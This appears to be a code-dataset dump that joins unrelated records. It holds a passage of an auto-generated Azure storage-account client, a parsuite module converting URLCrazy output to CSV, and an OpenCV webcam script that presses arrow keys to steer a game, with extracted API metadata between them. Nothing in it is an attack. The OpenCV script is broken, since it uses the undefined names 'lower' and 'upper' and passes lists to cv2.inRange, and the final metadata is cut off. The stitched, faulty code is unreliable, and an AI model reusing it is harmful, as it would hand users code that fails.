:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts/{accountName}'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'accountName': self._serialize.url("account_name", account_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.delete(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200, 204]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def get_properties(
self, resource_group_name, account_name, custom_headers=None, raw=False, **operation_config):
"""Returns the properties for the specified storage account including but
not limited to name, account type, location, and account status. The
ListKeys operation should be used to retrieve storage keys.
:param resource_group_name: The name of the resource group within the
user’s subscription.
:type resource_group_name: str
:param account_name: The name of the storage account within the
specified resource group. Storage account names must be between 3
and 24 characters in length and use numbers and lower-case letters
only.
:type account_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`StorageAccount
<Fixtures.AcceptanceTestsStorageManagementClient.models.StorageAccount>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts/{accountName}'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'accountName': self._serialize.url("account_name", account_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('StorageAccount', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def update(
self, resource_group_name, account_name, parameters, custom_headers=None, raw=False, **operation_config):
"""Updates the account type or tags for a storage account. It can also be
used to add a custom domain (note that custom domains cannot be added
via the Create operation). Only one custom domain is supported per
storage account. This API can only be used to update one of tags,
accountType, or customDomain per call. To update multiple of these
properties, call the API multiple times with one change per call.
This call does not change the storage keys for the account. If you
want to change storage account keys, use the RegenerateKey operation.
The location and name of the storage account cannot be changed after
creation.
:param resource_group_name: The name of the resource group within the
user’s subscription.
:type resource_group_name: str
:param account_name: The name of the storage account within the
specified resource group. Storage account names must be between 3
and 24 characters in length and use numbers and lower-case letters
only.
:type account_name: str
:param parameters: The parameters to update on the account. Note that
only one property can be changed at a time using this API.
:type parameters: :class:`StorageAccountUpdateParameters
<Fixtures.AcceptanceTestsStorageManagementClient.models.StorageAccountUpdateParameters>`
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`StorageAccount
<Fixtures.AcceptanceTestsStorageManagementClient.models.StorageAccount>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts/{accountName}'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'accountName': self._serialize.url("account_name", account_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'StorageAccountUpdateParameters')
# Construct and send request
request = self._client.patch(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('StorageAccount', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def list_keys(
self, resource_group_name, account_name, custom_headers=None, raw=False, **operation_config):
"""Lists the access keys for the specified storage account.
:param resource_group_name: The name of the resource group within the
user’s subscription.
:type resource_group_name: str
:param account_name: The name of the storage account.
:type account_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`StorageAccountKeys
<Fixtures.AcceptanceTestsStorageManagementClient.models.StorageAccountKeys>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts/{accountName}/listKeys'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'accountName': self._serialize.url("account_name", account_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('StorageAccountKeys', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def list(
self, custom_headers=None, raw=False, **operation_config):
"""Lists all the storage accounts available under the subscription. Note
that storage keys are not returned; use the ListKeys operation for
this.
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`StorageAccountPaged
<Fixtures.AcceptanceTestsStorageManagementClient.models.StorageAccountPaged>`
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
def internal_paging(next_link=None, raw=False):
if not next_link:
# Construct URL
url = '/subscriptions/{subscriptionId}/providers/Microsoft.Storage/storageAccounts'
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(
request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
deserialized = models.StorageAccountPaged(internal_paging, self._deserialize.dependencies)
if raw:
header_dict = {}
client_raw_response = models.StorageAccountPaged(internal_paging, self._deserialize.dependencies, header_dict)
return client_raw_response
return deserialized
def list_by_resource_group(
self, resource_group_name, custom_headers=None, raw=False, **operation_config):
"""Lists all the storage accounts available under the given resource
group. Note that storage keys are not returned; use the ListKeys
operation for this.
:param resource_group_name: The name of the resource group within the
user’s subscription.
:type resource_group_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`StorageAccountPaged
<Fixtures.AcceptanceTestsStorageManagementClient.models.StorageAccountPaged>`
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
def internal_paging(next_link=None, raw=False):
if not next_link:
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(
request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
deserialized = models.StorageAccountPaged(internal_paging, self._deserialize.dependencies)
if raw:
header_dict = {}
client_raw_response = models.StorageAccountPaged(internal_paging, self._deserialize.dependencies, header_dict)
return client_raw_response
return deserialized
def regenerate_key(
self, resource_group_name, account_name, key_name=None, custom_headers=None, raw=False, **operation_config):
"""Regenerates the access keys for the specified storage account.
:param resource_group_name: The name of the resource group within the
user’s subscription.
:type resource_group_name: str
:param account_name: The name of the storage account within the
specified resource group. Storage account names must be between 3
and 24 characters in length and use numbers and lower-case letters
only.
:type account_name: str
:param key_name: Possible values include: 'key1', 'key2'
:type key_name: str or :class:`KeyName
<Fixtures.AcceptanceTestsStorageManagementClient.models.KeyName>`
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`StorageAccountKeys
<Fixtures.AcceptanceTestsStorageManagementClient.models.StorageAccountKeys>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
regenerate_key = models.StorageAccountRegenerateKeyParameters(key_name=key_name)
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts/{accountName}/regenerateKey'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'accountName': self._serialize.url("account_name", account_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(regenerate_key, 'StorageAccountRegenerateKeyParameters')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('StorageAccountKeys', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
| [
"uuid.uuid1",
"msrest.pipeline.ClientRawResponse",
"msrestazure.azure_exceptions.CloudError",
"msrestazure.azure_operation.AzureOperationPoller"
] | [((8938, 9063), 'msrestazure.azure_operation.AzureOperationPoller', 'AzureOperationPoller', (['long_running_send', 'get_long_running_output', 'get_long_running_status', 'long_running_operation_timeout'], {}), '(long_running_send, get_long_running_output,\n get_long_running_status, long_running_operation_timeout)\n', (8958, 9063), False, 'from msrestazure.azure_operation import AzureOperationPoller\n'), ((3908, 3928), 'msrestazure.azure_exceptions.CloudError', 'CloudError', (['response'], {}), '(response)\n', (3918, 3928), False, 'from msrestazure.azure_exceptions import CloudError\n'), ((4227, 4268), 'msrest.pipeline.ClientRawResponse', 'ClientRawResponse', (['deserialized', 'response'], {}), '(deserialized, response)\n', (4244, 4268), False, 'from msrest.pipeline import ClientRawResponse\n'), ((11743, 11763), 'msrestazure.azure_exceptions.CloudError', 'CloudError', (['response'], {}), '(response)\n', (11753, 11763), False, 'from msrestazure.azure_exceptions import CloudError\n'), ((11906, 11939), 'msrest.pipeline.ClientRawResponse', 'ClientRawResponse', (['None', 'response'], {}), '(None, response)\n', (11923, 11939), False, 'from msrest.pipeline import ClientRawResponse\n'), ((14907, 14927), 'msrestazure.azure_exceptions.CloudError', 'CloudError', (['response'], {}), '(response)\n', (14917, 14927), False, 'from msrestazure.azure_exceptions import CloudError\n'), ((15213, 15254), 'msrest.pipeline.ClientRawResponse', 'ClientRawResponse', (['deserialized', 'response'], {}), '(deserialized, response)\n', (15230, 15254), False, 'from msrest.pipeline import ClientRawResponse\n'), ((19188, 19208), 'msrestazure.azure_exceptions.CloudError', 'CloudError', (['response'], {}), '(response)\n', (19198, 19208), False, 'from msrestazure.azure_exceptions import CloudError\n'), ((19494, 19535), 'msrest.pipeline.ClientRawResponse', 'ClientRawResponse', (['deserialized', 'response'], {}), '(deserialized, response)\n', (19511, 19535), False, 'from msrest.pipeline import ClientRawResponse\n'), ((22210, 22230), 'msrestazure.azure_exceptions.CloudError', 'CloudError', (['response'], {}), '(response)\n', (22220, 22230), False, 'from msrestazure.azure_exceptions import CloudError\n'), ((22520, 22561), 'msrest.pipeline.ClientRawResponse', 'ClientRawResponse', (['deserialized', 'response'], {}), '(deserialized, response)\n', (22537, 22561), False, 'from msrest.pipeline import ClientRawResponse\n'), ((32054, 32074), 'msrestazure.azure_exceptions.CloudError', 'CloudError', (['response'], {}), '(response)\n', (32064, 32074), False, 'from msrestazure.azure_exceptions import CloudError\n'), ((32364, 32405), 'msrest.pipeline.ClientRawResponse', 'ClientRawResponse', (['deserialized', 'response'], {}), '(deserialized, response)\n', (32381, 32405), False, 'from msrest.pipeline import ClientRawResponse\n'), ((3214, 3226), 'uuid.uuid1', 'uuid.uuid1', ([], {}), '()\n', (3224, 3226), False, 'import uuid\n'), ((7121, 7133), 'uuid.uuid1', 'uuid.uuid1', ([], {}), '()\n', (7131, 7133), False, 'import uuid\n'), ((8192, 8212), 'msrestazure.azure_exceptions.CloudError', 'CloudError', (['response'], {}), '(response)\n', (8202, 8212), False, 'from msrestazure.azure_exceptions import CloudError\n'), ((8526, 8567), 'msrest.pipeline.ClientRawResponse', 'ClientRawResponse', (['deserialized', 'response'], {}), '(deserialized, response)\n', (8543, 8567), False, 'from msrest.pipeline import ClientRawResponse\n'), ((11202, 11214), 'uuid.uuid1', 'uuid.uuid1', ([], {}), '()\n', (11212, 11214), False, 'import uuid\n'), ((14374, 14386), 'uuid.uuid1', 'uuid.uuid1', ([], {}), '()\n', (14384, 14386), False, 'import uuid\n'), ((18510, 18522), 'uuid.uuid1', 'uuid.uuid1', ([], {}), '()\n', (18520, 18522), False, 'import uuid\n'), ((21676, 21688), 'uuid.uuid1', 'uuid.uuid1', ([], {}), '()\n', (21686, 21688), False, 'import uuid\n'), ((25032, 25052), 'msrestazure.azure_exceptions.CloudError', 'CloudError', (['response'], {}), '(response)\n', (25042, 25052), False, 'from msrestazure.azure_exceptions import CloudError\n'), ((28293, 28313), 'msrestazure.azure_exceptions.CloudError', 'CloudError', (['response'], {}), '(response)\n', (28303, 28313), False, 'from msrestazure.azure_exceptions import CloudError\n'), ((31366, 31378), 'uuid.uuid1', 'uuid.uuid1', ([], {}), '()\n', (31376, 31378), False, 'import uuid\n'), ((24446, 24458), 'uuid.uuid1', 'uuid.uuid1', ([], {}), '()\n', (24456, 24458), False, 'import uuid\n'), ((27707, 27719), 'uuid.uuid1', 'uuid.uuid1', ([], {}), '()\n', (27717, 27719), False, 'import uuid\n')] |
from parsuite.core.argument import Argument
from parsuite import helpers
from parsuite.core.suffix_printer import *
from pathlib import Path
import xml.etree.ElementTree as ET
import argparse
import os
import re
help = 'Convert URLCrazy output to CSV'
args = [
Argument('--output-file', '-of', required=True,
help='Output file.')
]
ppat = prefix_pattern = re.compile('^(Bit Flipping|Character Insertion|Character Omission|'\
'Character Repeat|Character Replacement|Character Swap|Homoglyphs|Homophones|'\
'Missing Dot|Singular or Pluralise|Vowel Swap|Wrong TLD)')
def parse(input_file=None, output_file=None, **kwargs):
sprint('Parsing URLCrazy file')
output = ['"Typo Type","Typo","DNS-A","CC-A","DNS-MX","Extn"']
with open(input_file) as infile:
for line in infile:
if re.search(ppat,line):
output.append('"'+re.sub('\s{2,}','","',line.strip())+'"')
sprint('Writing output file')
with open(output_file,'w') as outfile:
for line in output:
outfile.write(line+'\n')
sprint('Done!')
return 0
| [
"re.search",
"parsuite.core.argument.Argument",
"re.compile"
] | [((371, 580), 're.compile', 're.compile', (['"""^(Bit Flipping|Character Insertion|Character Omission|Character Repeat|Character Replacement|Character Swap|Homoglyphs|Homophones|Missing Dot|Singular or Pluralise|Vowel Swap|Wrong TLD)"""'], {}), "(\n '^(Bit Flipping|Character Insertion|Character Omission|Character Repeat|Character Replacement|Character Swap|Homoglyphs|Homophones|Missing Dot|Singular or Pluralise|Vowel Swap|Wrong TLD)'\n )\n", (381, 580), False, 'import re\n'), ((267, 335), 'parsuite.core.argument.Argument', 'Argument', (['"""--output-file"""', '"""-of"""'], {'required': '(True)', 'help': '"""Output file."""'}), "('--output-file', '-of', required=True, help='Output file.')\n", (275, 335), False, 'from parsuite.core.argument import Argument\n'), ((838, 859), 're.search', 're.search', (['ppat', 'line'], {}), '(ppat, line)\n', (847, 859), False, 'import re\n')] |
#!/usr/bin/env python
# coding: utf-8
# In[1]:
#Libraries
import cv2
import numpy as np
import pyautogui
import keyboard
# In[2]:
#Color to detect BGR
l = [17, 15, 100] #lower
u = [80, 76, 220] #upper
# In[3]:
#region coordinates
k_left, k_top, k_right, k_bottom = 640, 30, 440, 130
h_left, h_top, h_right, h_bottom = 440, 130, 240, 330
s_left, s_top, s_right, s_bottom = 840, 130, 640, 330
f_left, f_top, f_right, f_bottom = 640, 330, 440, 430
# In[4]:
#Key Pressed
current_key_pressed = set()
# In[5]:
#Accelerate
def up():
#print("W")
pyautogui.keyDown('up')
current_key_pressed.add('w')
# In[6]:
#Steering Right
def right():
#print("D")
pyautogui.keyDown('right')
current_key_pressed.add('d')
# In[7]:
#Steering Left
def left():
#print("A")
pyautogui.keyDown('left')
current_key_pressed.add('a')
# In[8]:
#Brakes
def down():
#print("S")
pyautogui.keyDown('down')
current_key_pressed.add('s')
# In[9]:
#Find contours
def findContours(image):
img = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)
threshold = cv2.threshold(img, 15, 255, cv2.THRESH_BINARY)[1]
(_, cnts, _) = cv2.findContours(threshold.copy(),cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)
return len(cnts)
# In[10]:
#Main function
if __name__=='__main__':
aWeight=0.5
cam=cv2.VideoCapture(0)
cam.set(3,1280)
cam.set(4,720)
cam.set(cv2.CAP_PROP_FPS,60)
while True:
buttonPressed = False
buttonPressed_leftright = False
status, frame = cam.read()
clone = frame.copy()
clone = cv2.flip(clone,1)
clone = cv2.resize(clone,(1280,720))
reg_up = clone[k_top:k_bottom, k_right:k_left]
reg_left = clone[h_top:h_bottom, h_right:h_left]
reg_right = clone[s_top:s_bottom, s_right:s_left]
reg_down = clone[f_top:f_bottom, f_right:f_left]
reg_up = cv2.GaussianBlur(reg_up, (7,7), 0)
reg_right = cv2.GaussianBlur(reg_right, (7,7), 0)
reg_left = cv2.GaussianBlur(reg_left, (7,7), 0)
reg_down = cv2.GaussianBlur(reg_down, (7,7), 0)
hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
mask = cv2.inRange(hsv, l, u)
mask = cv2.erode(mask, None, iterations=2)
mask = cv2.dilate(mask, None, iterations=2)
l = np.array(lower, dtype="uint8")
u = np.array(upper, dtype="uint8")
mask_up = cv2.inRange(reg_up, l, u)
mask_right = cv2.inRange(reg_right, l, u)
mask_left = cv2.inRange(reg_left, l, u)
mask_down = cv2.inRange(reg_down, l, u)
out_up = cv2.bitwise_and(reg_up, reg_up, mask=mask_up)
out_right = cv2.bitwise_and(reg_right, reg_right, mask=mask_right)
out_left = cv2.bitwise_and(reg_left, reg_left, mask=mask_left)
out_down = cv2.bitwise_and(reg_down, reg_down, mask=mask_down)
cnts_up = findContours(out_up)
cnts_right = findContours(out_right)
cnts_left = findContours(out_left)
cnts_down = findContours(out_down)
if (cnts_up > 0):
up()
buttonPressed = True
elif (cnts_right > 0):
right()
buttonPressed = True
buttonPressed_leftright = True
elif (cnts_left > 0):
left()
buttonPressed = True
buttonPressed_leftright = True
elif (cnts_down > 0):
down()
buttonPressed = True
image_up = cv2.rectangle(clone, (k_left, k_top), (k_right, k_bottom), (255,0,255,0.5), 2)
image_left = cv2.rectangle(clone, (h_left, h_top), (h_right, h_bottom), (255,0,0,0.5), 2)
image_right = cv2.rectangle(clone, (s_left, s_top), (s_right, s_bottom), (0,0,255,0.5), 2)
image_down = cv2.rectangle(clone, (f_left, f_top), (f_right, f_bottom), (0,255,255,0.5), 2)
cv2.putText(image_up, "W", (k_left-170,k_top+110), cv2.FONT_HERSHEY_SIMPLEX, 0.9, (36,255,12), 2)
cv2.putText(image_left, "A", (h_left-170,h_top+200), cv2.FONT_HERSHEY_SIMPLEX, 0.9, (36,255,12), 2)
cv2.putText(image_right, "D", (s_left-170,s_top+200), cv2.FONT_HERSHEY_SIMPLEX, 0.9, (36,255,12), 2)
cv2.putText(image_down, "S", (f_left-170,f_top+110), cv2.FONT_HERSHEY_SIMPLEX, 0.9, (36,255,12), 2)
cv2.namedWindow("video",cv2.WINDOW_AUTOSIZE)
cv2.imshow("video", clone)
if not buttonPressed and len(current_key_pressed) != 0:
for key in current_key_pressed:
pyautogui.keyUp(key)
current_key_pressed = set()
if not buttonPressed_leftright and (('a' in current_key_pressed) or ('d' in current_key_pressed)):
if 'a' in current_key_pressed:
pyautogui.keyUp('left')
current_key_pressed.remove('a')
elif 'd' in current_key_pressed:
pyautogui.keyUp('right')
current_key_pressed.remove('d')
if cv2.waitKey(1) & 0Xff == ord('q'):
break
cam.release()
cv2.destroyAllWindows()
| [
"cv2.rectangle",
"cv2.imshow",
"numpy.array",
"cv2.destroyAllWindows",
"cv2.threshold",
"cv2.erode",
"cv2.waitKey",
"pyautogui.keyDown",
"cv2.putText",
"cv2.cvtColor",
"cv2.resize",
"cv2.GaussianBlur",
"cv2.namedWindow",
"cv2.flip",
"cv2.inRange",
"cv2.bitwise_and",
"cv2.VideoCapture... | [((566, 589), 'pyautogui.keyDown', 'pyautogui.keyDown', (['"""up"""'], {}), "('up')\n", (583, 589), False, 'import pyautogui\n'), ((685, 711), 'pyautogui.keyDown', 'pyautogui.keyDown', (['"""right"""'], {}), "('right')\n", (702, 711), False, 'import pyautogui\n'), ((805, 830), 'pyautogui.keyDown', 'pyautogui.keyDown', (['"""left"""'], {}), "('left')\n", (822, 830), False, 'import pyautogui\n'), ((917, 942), 'pyautogui.keyDown', 'pyautogui.keyDown', (['"""down"""'], {}), "('down')\n", (934, 942), False, 'import pyautogui\n'), ((1039, 1078), 'cv2.cvtColor', 'cv2.cvtColor', (['image', 'cv2.COLOR_BGR2GRAY'], {}), '(image, cv2.COLOR_BGR2GRAY)\n', (1051, 1078), False, 'import cv2\n'), ((1340, 1359), 'cv2.VideoCapture', 'cv2.VideoCapture', (['(0)'], {}), '(0)\n', (1356, 1359), False, 'import cv2\n'), ((5079, 5102), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (5100, 5102), False, 'import cv2\n'), ((1094, 1140), 'cv2.threshold', 'cv2.threshold', (['img', '(15)', '(255)', 'cv2.THRESH_BINARY'], {}), '(img, 15, 255, cv2.THRESH_BINARY)\n', (1107, 1140), False, 'import cv2\n'), ((1610, 1628), 'cv2.flip', 'cv2.flip', (['clone', '(1)'], {}), '(clone, 1)\n', (1618, 1628), False, 'import cv2\n'), ((1644, 1674), 'cv2.resize', 'cv2.resize', (['clone', '(1280, 720)'], {}), '(clone, (1280, 720))\n', (1654, 1674), False, 'import cv2\n'), ((1919, 1954), 'cv2.GaussianBlur', 'cv2.GaussianBlur', (['reg_up', '(7, 7)', '(0)'], {}), '(reg_up, (7, 7), 0)\n', (1935, 1954), False, 'import cv2\n'), ((1974, 2012), 'cv2.GaussianBlur', 'cv2.GaussianBlur', (['reg_right', '(7, 7)', '(0)'], {}), '(reg_right, (7, 7), 0)\n', (1990, 2012), False, 'import cv2\n'), ((2031, 2068), 'cv2.GaussianBlur', 'cv2.GaussianBlur', (['reg_left', '(7, 7)', '(0)'], {}), '(reg_left, (7, 7), 0)\n', (2047, 2068), False, 'import cv2\n'), ((2087, 2124), 'cv2.GaussianBlur', 'cv2.GaussianBlur', (['reg_down', '(7, 7)', '(0)'], {}), '(reg_down, (7, 7), 0)\n', (2103, 2124), False, 'import cv2\n'), ((2147, 2185), 'cv2.cvtColor', 'cv2.cvtColor', (['frame', 'cv2.COLOR_BGR2HSV'], {}), '(frame, cv2.COLOR_BGR2HSV)\n', (2159, 2185), False, 'import cv2\n'), ((2210, 2232), 'cv2.inRange', 'cv2.inRange', (['hsv', 'l', 'u'], {}), '(hsv, l, u)\n', (2221, 2232), False, 'import cv2\n'), ((2248, 2283), 'cv2.erode', 'cv2.erode', (['mask', 'None'], {'iterations': '(2)'}), '(mask, None, iterations=2)\n', (2257, 2283), False, 'import cv2\n'), ((2299, 2335), 'cv2.dilate', 'cv2.dilate', (['mask', 'None'], {'iterations': '(2)'}), '(mask, None, iterations=2)\n', (2309, 2335), False, 'import cv2\n'), ((2349, 2379), 'numpy.array', 'np.array', (['lower'], {'dtype': '"""uint8"""'}), "(lower, dtype='uint8')\n", (2357, 2379), True, 'import numpy as np\n'), ((2392, 2422), 'numpy.array', 'np.array', (['upper'], {'dtype': '"""uint8"""'}), "(upper, dtype='uint8')\n", (2400, 2422), True, 'import numpy as np\n'), ((2442, 2467), 'cv2.inRange', 'cv2.inRange', (['reg_up', 'l', 'u'], {}), '(reg_up, l, u)\n', (2453, 2467), False, 'import cv2\n'), ((2489, 2517), 'cv2.inRange', 'cv2.inRange', (['reg_right', 'l', 'u'], {}), '(reg_right, l, u)\n', (2500, 2517), False, 'import cv2\n'), ((2538, 2565), 'cv2.inRange', 'cv2.inRange', (['reg_left', 'l', 'u'], {}), '(reg_left, l, u)\n', (2549, 2565), False, 'import cv2\n'), ((2586, 2613), 'cv2.inRange', 'cv2.inRange', (['reg_down', 'l', 'u'], {}), '(reg_down, l, u)\n', (2597, 2613), False, 'import cv2\n'), ((2632, 2677), 'cv2.bitwise_and', 'cv2.bitwise_and', (['reg_up', 'reg_up'], {'mask': 'mask_up'}), '(reg_up, reg_up, mask=mask_up)\n', (2647, 2677), False, 'import cv2\n'), ((2698, 2752), 'cv2.bitwise_and', 'cv2.bitwise_and', (['reg_right', 'reg_right'], {'mask': 'mask_right'}), '(reg_right, reg_right, mask=mask_right)\n', (2713, 2752), False, 'import cv2\n'), ((2772, 